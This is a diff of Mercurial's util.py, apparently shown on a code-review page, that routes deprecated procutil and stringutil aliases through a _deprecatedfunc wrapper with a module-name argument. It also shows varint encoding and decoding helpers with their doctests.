3689 3689 if fn not in ctx and fn not in others:
3690 3690 return fn
3691 3691
3692 3692 def readexactly(stream, n):
3693 3693 '''read n bytes from stream.read and abort if less was available'''
3694 3694 s = stream.read(n)
3695 3695 if len(s) < n:
3696 3696 raise error.Abort(_("stream ended unexpectedly"
3697 3697 " (got %d bytes, expected %d)")
3698 3698 % (len(s), n))
3699 3699 return s
3700 3700
3701 3701 def uvarintencode(value):
3702 3702 """Encode an unsigned integer value to a varint.
3703 3703
3704 3704 A varint is a variable length integer of 1 or more bytes. Each byte
3705 3705 except the last has the most significant bit set. The lower 7 bits of
3706 3706 each byte store the 2's complement representation, least significant group
3707 3707 first.
3708 3708
3709 3709 >>> uvarintencode(0)
3710 3710 '\\x00'
3711 3711 >>> uvarintencode(1)
3712 3712 '\\x01'
3713 3713 >>> uvarintencode(127)
3714 3714 '\\x7f'
3715 3715 >>> uvarintencode(1337)
3716 3716 '\\xb9\\n'
3717 3717 >>> uvarintencode(65536)
3718 3718 '\\x80\\x80\\x04'
3719 3719 >>> uvarintencode(-1)
3720 3720 Traceback (most recent call last):
3721 3721 ...
3722 3722 ProgrammingError: negative value for uvarint: -1
3723 3723 """
3724 3724 if value < 0:
3725 3725 raise error.ProgrammingError('negative value for uvarint: %d'
3726 3726 % value)
3727 3727 bits = value & 0x7f
3728 3728 value >>= 7
3729 3729 bytes = []
3730 3730 while value:
3731 3731 bytes.append(pycompat.bytechr(0x80 | bits))
3732 3732 bits = value & 0x7f
3733 3733 value >>= 7
3734 3734 bytes.append(pycompat.bytechr(bits))
3735 3735
3736 3736 return ''.join(bytes)
3737 3737
3738 3738 def uvarintdecodestream(fh):
3739 3739 """Decode an unsigned variable length integer from a stream.
3740 3740
3741 3741 The passed argument is anything that has a ``.read(N)`` method.
3742 3742
3743 3743 >>> try:
3744 3744 ... from StringIO import StringIO as BytesIO
3745 3745 ... except ImportError:
3746 3746 ... from io import BytesIO
3747 3747 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3748 3748 0
3749 3749 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3750 3750 1
3751 3751 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3752 3752 127
3753 3753 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3754 3754 1337
3755 3755 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3756 3756 65536
3757 3757 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3758 3758 Traceback (most recent call last):
3759 3759 ...
3760 3760 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3761 3761 """
3762 3762 result = 0
3763 3763 shift = 0
3764 3764 while True:
3765 3765 byte = ord(readexactly(fh, 1))
3766 3766 result |= ((byte & 0x7f) << shift)
3767 3767 if not (byte & 0x80):
3768 3768 return result
3769 3769 shift += 7
3770 3770
3771 3771 ###
3772 3772 # Deprecation warnings for util.py splitting
3773 3773 ###
3774 3774
3775 def _deprecatedfunc(func, version):
3775 def _deprecatedfunc(func, version, modname=None):
3776 3776 def wrapped(*args, **kwargs):
3777 3777 fn = pycompat.sysbytes(func.__name__)
3778 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3778 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3779 3779 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3780 3780 nouideprecwarn(msg, version)
3781 3781 return func(*args, **kwargs)
3782 3782 wrapped.__name__ = func.__name__
3783 3783 return wrapped
3784 3784
3785 3785 defaultdateformats = dateutil.defaultdateformats
3786 3786 extendeddateformats = dateutil.extendeddateformats
3787 3787 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3788 3788 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3789 3789 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3790 3790 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3791 3791 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3792 3792 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3793 3793 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3794 3794
3795 3795 stderr = procutil.stderr
3796 3796 stdin = procutil.stdin
3797 3797 stdout = procutil.stdout
3798 explainexit = procutil.explainexit
3799 findexe = procutil.findexe
3800 getuser = procutil.getuser
3801 getpid = procutil.getpid
3802 hidewindow = procutil.hidewindow
3803 popen = procutil.popen
3804 quotecommand = procutil.quotecommand
3805 readpipe = procutil.readpipe
3806 setbinary = procutil.setbinary
3807 setsignalhandler = procutil.setsignalhandler
3808 shellquote = procutil.shellquote
3809 shellsplit = procutil.shellsplit
3810 spawndetached = procutil.spawndetached
3811 sshargs = procutil.sshargs
3812 testpid = procutil.testpid
3798 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3799 modname='utils.procutil')
3800 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3801 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3802 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3803 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3804 modname='utils.procutil')
3805 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3806 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3807 modname='utils.procutil')
3808 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3809 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3810 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3811 modname='utils.procutil')
3812 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3813 modname='utils.procutil')
3814 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3815 modname='utils.procutil')
3816 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3817 modname='utils.procutil')
3818 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3819 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3813 3820 try:
3814 setprocname = procutil.setprocname
3821 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3822 modname='utils.procutil')
3815 3823 except AttributeError:
3816 3824 pass
3817 3825 try:
3818 unblocksignal = procutil.unblocksignal
3826 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3827 modname='utils.procutil')
3819 3828 except AttributeError:
3820 3829 pass
3821 3830 closefds = procutil.closefds
3822 isatty = procutil.isatty
3823 popen2 = procutil.popen2
3824 popen3 = procutil.popen3
3825 popen4 = procutil.popen4
3826 pipefilter = procutil.pipefilter
3827 tempfilter = procutil.tempfilter
3828 filter = procutil.filter
3829 mainfrozen = procutil.mainfrozen
3830 hgexecutable = procutil.hgexecutable
3831 isstdin = procutil.isstdin
3832 isstdout = procutil.isstdout
3833 shellenviron = procutil.shellenviron
3834 system = procutil.system
3835 gui = procutil.gui
3836 hgcmd = procutil.hgcmd
3837 rundetached = procutil.rundetached
3831 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3832 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3833 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3834 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3835 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3836 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3837 filter = _deprecatedfunc(procutil.filter, '4.6')
3838 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3839 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3840 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3841 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3842 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3843 system = _deprecatedfunc(procutil.system, '4.6')
3844 gui = _deprecatedfunc(procutil.gui, '4.6')
3845 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3846 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3838 3847
3839 3848 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
3840 3849 binary = _deprecatedfunc(stringutil.binary, '4.6')
3841 3850 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3842 3851 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3843 3852 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3844 3853 email = _deprecatedfunc(stringutil.email, '4.6')
3845 3854 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3846 3855 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3847 3856 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3848 3857 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3849 3858 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3850 3859 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3851 3860 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now